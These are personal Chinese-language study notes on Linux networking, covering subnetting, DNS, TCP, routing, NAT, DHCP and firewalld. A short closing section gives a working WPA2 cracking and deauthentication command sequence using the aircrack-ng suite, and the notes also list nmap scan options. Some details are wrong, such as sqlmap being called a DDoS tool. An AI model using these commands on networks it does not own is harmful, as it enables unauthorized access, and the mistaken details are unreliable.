[!warning] 未严格按照中文排版修订

这篇属于是比较久远的了，很久也没有所谓的修订过了，趁热打铁就把这篇全部修一遍

不过修的比较烂，因为当时水平有限，这篇写的格式就比较狗屎，如果真的严格按照中文排版，那工程量相当大，没什么时间，所以就这样吧

Linux 网络基础 1

1.1 电脑如何上网

• 网卡-（有线）-（无线）
• 路由器（wifi 2.4g/5.0g）[一般四五个口（接外网&内网但一般还有光猫，得连在光猫上）]
• 交换机【基本多少口的都有】（连接路由器和网卡[网线太多就串交换机]）分主力和其他的，主力的性能好贵点。。。
• 光猫-连通网络服务商的设备箱 光纤熔纤机（挖到光缆就废废） 再接到服务商机房 【光缆单位为芯】【早先是电话线（）符合《计算机网络自上而下》】【电话线接通（现在变为光猫）猫转换模拟信号，远了就听不到了，6m宽带就是电话线极限了】【中兴，华为】【别搞错了千兆口和百兆口，厂商为了省钱一般都只有一个千兆口】【网络运行商之间也会互相连通】
• wifi 6【802.11ax】【最大速率9.6gbps】（最新技术）
• WiFi 5【802.11ac】【最大速率866Mbps】
• wifi 以前【802.11b-a-g-n】【最大速率1& 2-11-54-54-600mbps】
• wifi 7正在路上今年可能会跳票

1.2 osi 7层模型

• 电脑系统 windows Linux mac-os unix
  手机 andriod（ Linux + java 垃圾回收机制，碎片化问题 iOS（ unix + object-c）苹果没有
• 【网线标准 568b（橙白-橙-绿白-蓝-蓝白-绿-棕白-棕）（【定制】两头都错也能上网）】【四根线一般只能百兆，八根线可以千兆（速度也要协商）】【有双绞线的说法】
• 通讯介质【网线-双绞线-电信号，wifi 电磁波，光纤 光信号】
  • a.多操作系统
  • b.多介质
  • c.目标(保密)
  • d.多个软件同时网络问题
• 分层的作用
  • 物理层 信号转换的问题 数字信号 电信号
  • 数据链路层 mac 地址[每一块网卡都有唯一的地址] 唯一 物理地址 以太网
  • 网络层 IP 地址[公网 IP ( iana 分配 IP 地址) 内网 IP] 公网 IP 唯一 定位
  • 传输层 端口 TCP 可靠的,速度慢 长距离传输/ UDP 不可靠的,速度快 效率,实时性(直播一般是这样)]【每个服务端启动的时候都会监听一个端口】【 vnc 协议 5900/http:// 80 /ssh 22 】[例如 192.168.19.11:5900 ]
  • 会话层 会话【在部分协议里最后三层就是一层】
  • 表示层 文件的类型
  • 应用层 http ftp smtp【 qq 浏览器】

1.3 模型

• 目前用的最广 TCP/IP 协议 【4层&5层（以下为五层）】
  • 物理层 信号转换
  • 数据链路层 mac 识别每块网卡的身份
  • 网络层 源 IP 和目标 IP 地址 公共 私网 路由器
  • 传输层 TCP & UDP 端口 port TCP 报头+数据/ UDP报头+数据（源端口和目标端口 还有无数个小数据包的序列号）
  • 应用层 各种应用软件
  • 【抓包来分析的】

1.4 数据的封装与解封装

• 应用层---》 数据 5M
• 传输层发---》TCP 报文+数据1 TCP 报文+数据2 TCP 报文+数据3 ...
• 网络层---》IP 包+ TCP 报头+数据1 IP 包+ TCP 报头+数据2 ...
• 数据链路层===》数据帧 + TCP 包 + TCP报头 + 数据 1 数据帧 + IP 包 + TCP报头 + 数据2 ...
• 物理层===》将完整的数据包，由二进制转换成电信号
  .....................................
• 物理层===》 电信号转换成二进制
• 数据链路层===》 数据帧 + IP 包 + TCP 报头 + 数据 1
• 网络层---》IP 包+ TCP 报头 + 数据 1 IP 包 + TCP 报头+数据 2 ...
• 传输层发---》 TCP 报文 + 数据 1 TCP 报文 + 数据 2 TCP 报文 + 数据 3 ...
• 应用层---》 数据 5M

Linux 网络基础 2

2.1 IP地址的划分

• IP地址范围0.0.0.0~255.255.255.255
• 00000000 00000000 000000000 000000000 ===》 0.0.0.0
• 11111111 11111111 111111111 111111111 ===》 255.255.255.255
• 【计算机只能有32位的空间来储存IP地址】【IP地址总数4,294,967,296大约是43亿个】
• 不够用了nat == network address translation
• 内网IP网段10.0.0.0~10.255.255.255 （a类）16,777,214
• &172.16.0.0~172.16.31.255 （b类）1,048,576
• &192.168.0.0~192.168.255.255 （c类）65,536
  • a类 1.0.0.1~126.255.255.254【128】
  • b类 128.0.0.1~191.255.255.254【64】
  • c类 192.0.0.1~223.255.255.254【32】
  • d类 组播，vrrp协议，keepalive高可用224~239【16】
  • e类 科研240~255
• 为了缓解IPv4地址不够用的问题 32位

  • 1：IPv6 128位 16进制写法

  • 2：nat 网络地址转换

  • a：节约了大量的公网IP地址

  • b：减少了网络攻击

• 127.0.0.0~127.255.255.255特殊地址

2.2 子网掩码 【决定一个网段的大小】

• IP地址192.168.19.11

• 子网掩码255.255.255.0 === 192.168.19.11/24
  $\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad$ 10.0.0/8
  $\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad$ 172.16.0.0/16

• 网段里面的IP越多，网段范围越大

• 192.168.19.11/24

  • 11000000.10101000.00010011.00001011

  • 11111111.11111111.11111111.00000000=255.255.255.0

  • {$\qquad$ $\qquad$网 络 位 $\qquad$ $\qquad$}{主 机 位 }【24位含义】

  • 【2个IP地址的网络位相同，代表他们是同一个网段】

  • 11000000.10101000.00010011.00000000==》192.168.19.0 网络号

  • 11000000.10101000.00010011.00000001==》192.168.19.1 起始IP

  • 11000000.10101000.00010011.11111110==》192.168.19.254 结束IP

  • 11000000.10101000.00010011.00001111==》192.168.19.255 广播地址

  • 【同一个网段，物理线路接通，就可以直接通信！不是同一个网段，就算物理线路接通，也不可以直接通信！！】

  • 192.168.100.126/25===》192.168.100.126 255.255.255.128

  • 192.168.100.129/25===》192.168.100.129 255.255.255.128

  • 不在同一个网段不通【以下为计算网段】

  • 11000000 10101000 01100100 01111110 ===》192.168.100.126

  • 11111111 11111111 11111111 10000000 ===》255.255.255.128

  • 11000000 10101000 01100100 00000000 ===》192.168.100.0

  • 11000000 10101000 01100100 01111111 ===》255.255.255.127

  • 11000000 10101000 01100100 10000001 ===》192.168.100.129

  • 11111111 11111111 11111111 10000000 ===》255.255.255.128

  • 11000000 10101000 01100100 10000000 ===》192.168.100.128

  • 11000000 10101000 01100100 11111111 ===》192.168.100.255

• 不同网段之间的通讯必须由路由器转发【必须得会算子网掩码】

• 子网掩码值

  • 11111111 255
  • 11111110 254
  • 11111100 252
  • 11111000 248
  • 11110000 240
  • 11100000 224
  • 11000000 192
  • 10000000 128
  • 00000000 0

2.3 体验 路由器

• 软件路由器：软路由 + 普通pc

• 硬件路由器：普通路由器

• 企业路由器：企业级路由器

• 网络规划【两块网卡】

  • 一块nat模式桥接（外网）ikuai
  • 一块仅主机模式（内网） ikuai
    $\qquad\qquad\qquad$ [初始密码 admin 我自己改成了老密码]
  • 安装 akuai ：-【最后在安装镜像】安装镜像文件 记得给 1g 内存【后面步骤很简单】
    • 给两个网卡第一个仅主机模式 第二个 nat 模式
    • 设置 LAN（内网）/ WAN（外网）地址
    • 先设置 LAN（内网是本机 win11 上看的 vm1 IPv4）
    • 上 192.168.198.254（ ikuai ）网络设置
    • 手动配 win7 虚拟机 IPv4 地址 建议 192.168.198.100 子网掩码自动 网关一定要指向内网 IP 地址 192.168.198.254
    • 然后机器就能上网了
    • 可以通过行为管控 应用协议控制来控制上网直接阻断 192.168.198.0/24 网段

2.4 DNS 的历史和作用

• DNS 由来：计算机和计算机之间的通信 IP地址和端口

• 客户端端口是不固定的 随机的

• 服务端 192.168.198.254:80（端口）

• 百度 IP：180.65.33.218 新浪 IP：218.30.13.36

• IP 地址多了之后太难记了，而且后期还会更改，所以就有人开发了个程序

• 6.类似于电话簿 180.65.33.218 baidu （只是一个类比并不代表真的存在）

• 7.hosts 文件 IP 地址+备注 太麻烦了

• 然后就有了 DNS 服务端& DNS 客户端 把信息录入数据库

• 【抓包软件 A 记录 address 】

• 【 ping 的时间是一来一回 ping之前会进行 DNS 解析】

• 国内的常用 DNS ：

  • 阿里云 223.5.5.5 223.6.6.6
  • 百度 180.76.76.76
  • 腾讯 119.29.29.29
  • 国外 8.8.8.8
  • 南京信风 114.114.114.114（流氓广告）
  • 115.115.115.115
  • 360断网急救箱用了 DNS就变成114就毙了

• DNS 的作用将域名解析为 IP 地址 DNS 配错了上不了网

---

2.5 DNS 解析流程

• 【 DNS 的命令】Linux 上 DNS 相关命令 dig nslookup host
  （世界上有十三台根域名服务器）[九个在美国，欧洲两个位于瑞典和英国，亚洲一个为用户日本]【只有一个位于美国主根服务器】 【目前中国大力推进IPv6】

Linux 网络基础 3

3.1 文字编码

• 宽带为什么要除以8 1000Mbps == 125Mb/s
• 文件编码：
• 一个英文字母 1 字节
• 一个汉字 在 gbk gb2312 下 占 2 字节 256*256 = 65536
• utf-8 3字节
• 计算机，把现实的东西，转换到计算机的世界---建模
• ASCII码 【 gb 是国标的意思 gb2312 1980 年发布 gbk 1995 年发布兼容 gb2312 】
• 万国码 unicode 4 字节 00000000 00000000 00000000 00000001
• 可变成编码 utf-8 00000001 1 字节 3 字节

3.2 Linux 相关的 DNS 解析命令

• DNS：将域名解析成 IP 地址

• 计算机--服务器程序--- IP 地址 + 端口 固定

• 计算机--客户端程序--- IP 地址 + 端口 不固定

• 打开网站:

  • 将域名解析成 IP
  • 想目标网站的 IP + 端口

• Linux命令

  dig www.oldqiang.com / dig @223.5.5.5 www.oldqiang.com
  nslookup www.oldqiang.com / www.oldqiang.com 119.29.29.29
   host www.oldqiang.com / host www.oldqiang.com 119.29.29.29
   yum install bind-utils

• http:// 80 明文

• https:// 443 加密

3.3 DNS的记录类型

• A记录 【IPv4】www.oldqiang.com 123.xx.xx.xx
• CNAME 别名 www.oldqiang.com --> www.qstack.com -->......
• MX 邮箱专属
• NS nameserver 授权DNS解析
• AAAA 【IPv6】
• 域名分为国际顶级域名和国家域名
• 国际域名：com net org【非营利组织，你忍心吗？】 gov【政府】 edu【大学】 mil【军队，但几乎没人这么做】[后面三个域名需要特殊的机构才可以注册]
• 国家级域名【.cn（中国域名）.jp】
• 百度竞价排名 美团竞价排名 【都是贼贵】
• DNSpod.cn【腾讯域名售卖网站】

3.4 ARP 广播协议

• ARP 数据链路层（ADDRESS RESOLUTION PROTOCOL）
• 把 IP 地址解析成 mac 地址
• 【数据包想发出去需要 IP 地址以及 mac 地址】
• ARP 需要注意的
  • ARP 欺骗【 win10 之上系统本身的防火墙就够应对欺骗了】
  • 如果局域网规模太大，广播风暴【假如几千万台同时通讯广播就满天飞】

3.5 TCP三次握手

• 【数据包要先发给网关】【 TCP 和网络攻击有关系】【可靠的协议】
• 【每发一个数据包，需要确认】
• TCP 探测 物理线路通不通，TCP 的三次握手
• 【在网络世界里谁先发起请求谁就是客户端（一般来说）】
• TCP 数据包，6 种标识 SYN（握手包） FIN（finish断开连接包）PSH（数据包）
• ACK（确认包） RESET(重发包)
• 客户端发第一个包标识 SYN 并且带有随机序列号 seq = x，ack = 0
• 服务端发包回应 标识 ack，seq = y，ack = x + 1【网线八根线双车道四根上传，四根下载】
• 服务端再发包 标识 SYN，seq = y，ack = x + 1
• 客户端发包回应标识ack，seq = x + 1，ack = y + 1
• 【以上是所谓四次握手,但其实中间两步可以融合,变为三次握手】
• 标识 SYN，ACK，seq = Y，ack = x + 1
• 家用宽带和企业级宽带
• 作为一名普通用户都是下载多上传少一般来说速度是 10：1 & 5：1
• 企业级宽带一般来说是作为服务器的 上下行对等 1：1
• 1000 兆 民用 1000 来块/年

3.6 TCP四次挥手【快结束时】

• 客户端发送 FIN ，seq = x，ack = y
• 服务端发包回应 标识 ACK，seq = y，ack = x
• 等待服务端数据发送完成.........
• 服务端发送包 标识 FIN，seq = y，ack = x + 1
• 客户端回应标识 ACK，seq = x + 1，ack = y + 1

在计算机上进行网络通信时，您的计算机具有一个IP地址，该地址通过网关与其他网络进行通信。当您使用域名访问网站时，DNS服务器将域名解析为IP地址，然后通过该IP地址和特定的端口与目标服务器上的应用程序进行通信

Linux 网络基础 4

4.1 DDOS 如何防御【denied of service】

• 利用 TCP 三次握手，形成的攻击叫dos攻击（有成本的）
  • TCP UDP 都有端口
  • TCP 0-65535 10000 以内都作为服务端常用端口
  • 剩下都是客户端 4kb * 5w = 2000，000kb
• 【几乎无解】
• 防御 DDOS 攻击【拿钱砸就对了】
• 【客户端 1g/s 服务端 10g/s】
• 提升带宽 企业宽带太贵了血亏（大公司可取）
• 买高防 IP 要提前买打过来了再买白费....
• DDOS工具【sqlmap 反正就是上 GitHub 上搜 DDOS 就行了】

4.2 TCPdump抓包

• TCPdump -i eth0 icmp -nn
  • i指定网卡名称
  • nn 不把端口解析成应用层协议
  • c 指定抓包数量
  • s 不把随机序列和确认序列解析成绝对值
  • w 指定数据包保存的位置
• TCPdump 抓的包，wireshark 分析
• TCPdump -i eth0 TCP port 80 -nn -c 10 -w http.cap

---

4.3 Linux的网络命令 nmap 和 tracert 的使用

• yum install nmap [过滤filter]

• nmap -v IP 显示详细的扫描过程

• nmap -p IP 扫描指定端口

• nmap -A IP 全面扫描操作系统

• nmap -sP IP 进行ping扫描主机存活

• nmap -Pn/-P0 IP 禁ping扫描

• nmap -sS IP 进行TCP syn扫描 也叫半开放扫描

• nmap -sT IP 进行TCP连接扫描 （准确性高）

• nmap -sn IP范围

• nmap -O

• tracert -d windows系统

• traceroute n Linux不过会发生各种超时全是***

• 以上两部分等学到 Linux 系统再学.........现在真有点看不明白【 nmd 被逼的只能虚拟机安装 centos7 然后再连接 xshell 同时下载 wireshark 再用安装命令你安装 TCPdump 以及 sz】【 yum install TCPdump & yum install lrzsz 】

4.4 手动配置 IP 地址

• DHCP 服务端-分配 IP 地址范围 客户端 DHCP 自动获取
• DHCP 动态获取 IP 地址【windows IP地址冲突就会检测出冲突】
  • 静态设置 IP 就容易出现上面【】内的内容【公网 IP 一般是静态分配】
  • 【centos7 网卡配置路径 /etc/sysconfig/network-scrIPts/】

    • cp ifcfg-ens33 ifcfg-ensa36

    • vim ifcfg-ens33

      TYPE="Ethernet"
      BOOTPROTO="static""
      NAME="ens33"               [配IP]
      DEVICE="ens33"
      ONBOOT="yes"
      IPADDR=192.168.10.100
      NETMASK=255.255.255.0
      GETWAY=192.168.10.2
      DNS1=223.5.5.5
      DNS2=180.76.76.76
      systemctl restart network
      ssh root@192.168.10.100
      [root@localhost network-scrIPts]# cat ifcfg-ens36
      TYPE="Ethernet"
      BOOTPROTO="static""
      NAME="ens36"
      DEVICE="ens36"
      ONBOOT="yes"
      IPADDR=192.168.8.4
      NETMASK=255.255.255.0
      GETWAY=192.168.8.1
      DNS1=223.5.5.5  
      [root@localhost network-scrIPts]# cat ifcfg-ens33
      TYPE="Ethernet"
      BOOTPROTO="static""
      NAME="ens33"
      DEVICE="ens33"
      ONBOOT="yes"
      IPADDR=192.168.10.100
      NETMASK=255.255.255.0
      GETWAY=192.168.10.2
      DNS1=223.5.5.5

4.5 上不了网排查思路

• xshell 连不上的原因
  • 检查虚拟机的网络适配器，是否连接，是否为 nat 模式
  • 检查 vmware network adapter vmnet8 是否处于禁用状态
  • vmnet8 网卡的 IP 地址是否和虚拟机同一个网段
  • 检查虚拟机的 IP 是否正常
    • 【IP addr show】【删除命令rm 】
    • 【桥接模式：在桥接模式下，宿主机和虚拟机之间共享同一个物理网络接口，它们可以通过宿主机的物理网络接口连接到外部网络（如 Internet ）。宿主机和虚拟机都可以拥有自己的 IP 地址，它们在同一个子网中，并且可以相互通信。桥接模式使得虚拟机能够像物理主机一样直接与外部网络通信。
    • 【 NAT 模式：在 NAT 模式下，虚拟机通过宿主机的网络接口与外部网络通信。宿主机充当了一个网络地址转换（ NAT ）的角色，为虚拟机提供了一个私有的 IP 地址，并将虚拟机的网络流量转发到外部网络。虚拟机可以使用宿主机作为网关来访问外部网络，但外部网络无法直接访问虚拟机。NAT 模式通常用于需要隔离虚拟机与外部网络的场景。】
    • 【你妈的不得不说这块的内容确实搞人心态】
    • 【 nat 网卡】 虚拟机中虚拟网络设置 192.168.10.0 宿主机中 vm8 设置为 192.168.10.1 网关为 192.168.10.2 广播地址为 192.168.10.255 DHCP自动分配 192.168.10.3~254 第一台 centos7 IP 192.168.10.3 第二胎 centos7 IP 192.168.10.100 【第一台中的地址是 DHCP 是自动分配的，第二台中的地址是自己分配的】
• xshell 能连，但是上不了网
  • 能 ping 同公網 IP ，ping 不通域名，DNS 地址有問題
  • 物理機上不了網
    • 第一步：检查物理是否正常 第二步：ping 网关 第三步：ping 公网IP 第四步：ping www.baidu.com$\qquad\quad$ tracert -d www.qq.com 第五步：ping 自己服务器 电脑-普通交换机-核心交换机-企业级路由器-光猫-运营商isp
• 我叼你妈的多少有点离谱了。。。 这个 day4 足足学了将近两天，涉及的东西突然之间就变巨多还好坚持下来了 再有就是不小心输入繁体字是因为 ctrl + shift + f 会有快速切换的功能，下次别再犯傻了 vscode 里面使用搜索功能就是ctrl + f

---

Linux 网络基础 5

5.1 静态路由的环境准备

• 世界互联网格局是一个环形结构网络成本低

• 星形结构网络无法作为世界互联网主要格局的原因是铺线成本太高

• 但是本地都是星形结构

• 静态路由：需要人工配置

  • 动态路由：提前配置一些指令，路由器自己学习 【我就知道还要搞我，又让我下了个思科模拟器呜呜呜呜呜呜呜呜真真是服了】 网关是优先级最低的静态路由

5.2 静态路由

• ARP 能连通的直连路由 [1:192.168.20.11 2:192.168.20.12&172.16.1.12 3:172.16.1.13] 【route -n】 【route add -net 172.16.1.0/24 gw 192.168.20.12 】

• 您提供的命令 route add -net 172.16.1.0/24 gw 192.168.20.12 是用于在路由表中添加一个静态路由规则。这条命令的意思是将目标网络 172.16.1.0/24 的流量通过网关 192.168.20.12 发送出去。

• 解释一下命令中的各个部分：

  • route add：添加静态路由的命令。
  • net 172.16.1.0/24：指定目标网络的子网地址和子网掩码。在这种情况下，目标网络是 172.16.1.0/24。
  • gw 192.168.20.12：指定网关的 IP 地址。在这种情况下，网关是 192.168.20.12。
  • 这条命令的目的是告诉操作系统，当要访问的目标 IP 地址属于 172.16.1.0/24 网络时，应将流量发送到 192.168.20.12 这个网关进行转发。

• 请注意，这是一个示例命令，具体的配置可能因网络环境和需求而有所不同。在实际使用时，请根据您的网络配置和需求相应地调整目标网络和网关的值。另外，这个命令对于不同的操作系统可能会有所不同，因此请确保使用适用于您操作系统的正确命令和语法。

• TCPdump -i ens33 icmp -nn 配了以上的命令之后只能从1号传输到2号的第二块网卡传不到第三号 所以就需要以下的命令[路由器连通网段必须得有转发功能 计算机不属于自己的包会丢掉] 转发命令:echo 'net.IPv4.IP_forward = 1' >> /etc/sysctl.confcat /etc/sysctl.confTCPdump -i ens36 -nn 此时可以把包传给3号但是3号无法传包回去，因为没配路由 route add -net 192.168.20.0/24 gw 172.16.1.12 3号右端再添加一块网卡分配172.16.2.13 3号右端添加router5配置172.16.2.14 刚刚配置的静态路由只需要输入systemctl restart network就能还原

5.3 数据包发送的原理

• 原 mac【自己的】 目标 mac
• 原 IP【写自己的】 目标 IP 反正 mac 地址会一直变换【仅用于自己网段的通讯】重在理解 mac 地址变化

5.4 把Linux配置成路由器

• 上面配置的路由只有数据转发的作用，没有共享上网的作用 路由器：nat 地址转换，共享上网的功能 route add -net 0.0.0.0/0 gw 192.168.20.2（看虚拟机的网关） 清空at地址规则 IPtables -t nat -FIPtables -t nat -A POSTROUTING -s 172.16.1.0/24 -j MASQUERADEroute add -net 0.0.0.0/0 gw 172.16.1.12vim /etc/resolv.confnameserver 223.5.5.5 ttl 是time to live 的缩写，该字段指定IP包被路由器丢弃之前允许通过的最大网段数量【可以通过注册表来修改】

5.5 给Linux路由器配置DHCP服务

• 安装DHCP

  • yum install DHCP -y

  • 修改DHCP服务端的配置文件

  • vim /etc/DHCP/DHCPd.conf

    subnet 172.16.0.0 netmask 255.255.255.0 {
    range 172.16.0.100 172.16.0.250;
    option domain-name-servers 180.76.76.76;
    option drouters 172.16.0.12;
    default-lease-time 600;
    max-lease-time 7200;
    }

• 不带上网行为管理功能
  • 启动 DHCP 服务端
  • systemctl start DHCP.service
  • systemctl enable DHCPd.service

---

5.6 Linux 的系统防火墙 firewalld

• 4层 系统 防火墙【启用systemctl start firewalld.service】

• 察看防火墙状态systemctl status firewalld.service

• 查看服务netstat -lntup

• firewalld查看开放端口

  • firewall -cmd --list-ports
  • firewalld -cmd --list-services 所有服务定义在
  • /usr/lib/firewalld/services/

• 以下是一些常用的CentOS 7防火墙（Firewall）命令：

  • 启动防火墙：

  sudo systemctl start firewalld

  • 停止防火墙：

  sudo systemctl stop firewalld

  • 重启防火墙：

  sudo systemctl restart firewalld

  • 查看防火墙状态：

  sudo systemctl status firewalld

  • 设置防火墙开机启动：

  sudo systemctl enable firewalld

  • 禁用防火墙开机启动：

  sudo systemctl disable firewalld

  • 开放端口（临时）：

  sudo firewall-cmd --zone=public --add-port=端口号/协议

  • 持久开放端口（永久）：

  sudo firewall-cmd --zone=public --add-port=端口号/协议 --permanent

  • 关闭端口：

  sudo firewall-cmd --zone=public --remove-port=端口号/协议

  • 列出开放的端口：

    sudo firewall-cmd --zone=public --list-ports

  • 允许服务：

    sudo firewall-cmd --zone=public --add-service=服务名称

  • 拒绝服务：

    sudo firewall-cmd --zone=public --remove-service=服务名称

  • 列出允许的服务：

    sudo firewall-cmd --zone=public --list-services

• 这些是一些常用的 CentOS 7 防火墙命令，用于配置和管理防火墙规则。请确保以 root 权限或具有 sudo 权限的用户来运行这些命令。

Linux 网络基础 6

6.1 端口映射

• 光猫路由器一般都是 rom 固定死的
• 从外网来访问内网的服务

6.2 ikuai讲解

• 32 位操作系统 极限内存 4gb
• 64位操作系统 极限大得多 17,179,869,184 GB 做梦里。。。
• 大型的无线网络 例如鸟巢
• 【WiFi】
• 【ssid：xxxx】
• 【密码：11111111】
• ac 控制 ap 所有 ap 通过交换机连接 ac 自动调度牛的一
• ac 类似于手机漫游
• 【双机热备】两台路由 ikuai 中间接一根专线在一台坏的时候迅速切换第二
• RAID 磁盘阵列 普通家用一般不用 一般是服务器用 提升写入速度
• 也有风险如果一个硬盘坏了那就全坏了 raid 0 15m 5m 5m 5m【速度提升模式，容量也增加】
  • raid 1 为了保险 会写两份 15m 15m 如果有一个坏了换上另一个还会进行数据同步
  • raid 5 可以支持n块盘 只会浪费一块盘浪费cpu性能算是一种折中方案
  • raid 1 + 0 土豪性能兼具性能与安全就是浪费硬盘
• 看服务器一般上中关村
  • upnp 自动端口映射
  • vlan 虚拟局域网

6.3 vlan讲解

• 傻瓜交换机
• 网管交换机
• 程控交换机
• 二层交换机 mac 地址
• 三层交换机 网络层 IP地址 带路由功能
• vlan 逻辑隔离【一般是物理隔离】可以避免 ARP 欺骗

6.4 vpn演示

打通隧道访问内网 下面是一个简单的VPN（Virtual Private Network，虚拟私人网络）工作原理图示例：

          ┌───────────────┐               ┌───────────────┐
          │    Internet   │               │    Internet   │
          └───────────────┘               └───────────────┘
                  │                               │
                  │                               │
          ┌───────────────┐               ┌───────────────┐
          │    VPN 客户端   │               │    VPN 服务器   │
          └───────────────┘               └───────────────┘
                  │                               │
                  │                               │
          ┌───────────────┐               ┌───────────────┐
          │  客户端设备   │               │  目标服务器    │
          └───────────────┘               └───────────────┘

工作原理说明：

• VPN客户端：用户运行在自己设备上的VPN客户端软件，用于与VPN服务器建立连接。

• VPN服务器：由VPN服务提供商管理的服务器，用于处理客户端与目标服务器之间的通信。

• Internet：公共互联网，作为数据传输的媒介。

• 客户端设备：用户的计算机、手机或其他设备，需要通过VPN访问目标服务器。

• 目标服务器：用户希望访问的具体资源或服务所在的服务器。

VPN 的工作原理如下：

• 用户在本地设备上运行 VPN 客户端软件，并输入所需的连接参数，如服务器地址、用户名和密码。
• VPN 客户端通过Internet连接到 VPN 服务器。这通常使用加密的通信协议（如 OpenVPN、IPsec 等）来确保连接的安全性。
• 一旦建立了 VPN 连接，所有通过 VPN 客户端的流量将被加密并通过 Internet 传输到 VPN 服务器。
• VPN 服务器解密接收到的数据，并将其转发到目标服务器。
• 目标服务器将请求的数据返回给 VPN 服务器。
• VPN 服务器再次加密响应数据并通过 Internet 传输回 VPN 客户端。
• VPN客户端解密响应数据，并将其发送到用户的本地设备上进行处理和显示。 通过建立VPN连接，用户可以在公共网络上创建一个安全的隧道，使得他们的网络流量在传输过程中得到加密保护。这样可以实现远程访问内部网络资源、保护隐私和绕过地理限制等功能。 需要注意的是，具体的 VPN 实现和工作原理可能因使用的协议和技术而有所不同。上述示意图只是一个简单的示例，真实的 VPN 架构可能更为复杂。

6.5 如何防护WiFi密码

首先要用到 kali 系统【渗透测试专用】

• 开启无线监听模式airmon-ng start wlan0[airmon-ng查看网卡监听状态]【monitor】【信号值大于65别连了】 【WiFi有ch频道】[wpa2是无线网加密类型]

• 扫描范围 airodump-ng wlan0mon

• 抓WiFi握手包airodump-ng --bssid 52:02:05:9D:62:F9 -c 6 -w sxny wlan0mon( wifi 密码就在握手包里面) 手动添加 ssid

• 破解密码aircrack-ng -w top100.txt sxny-02.cap

• wifi攻击airplay-ng -0 8 -c mac地址 -a mac地址 wlan0mon

• 终于算是告一段落了。现在时间是 2024/3/11 0:34:57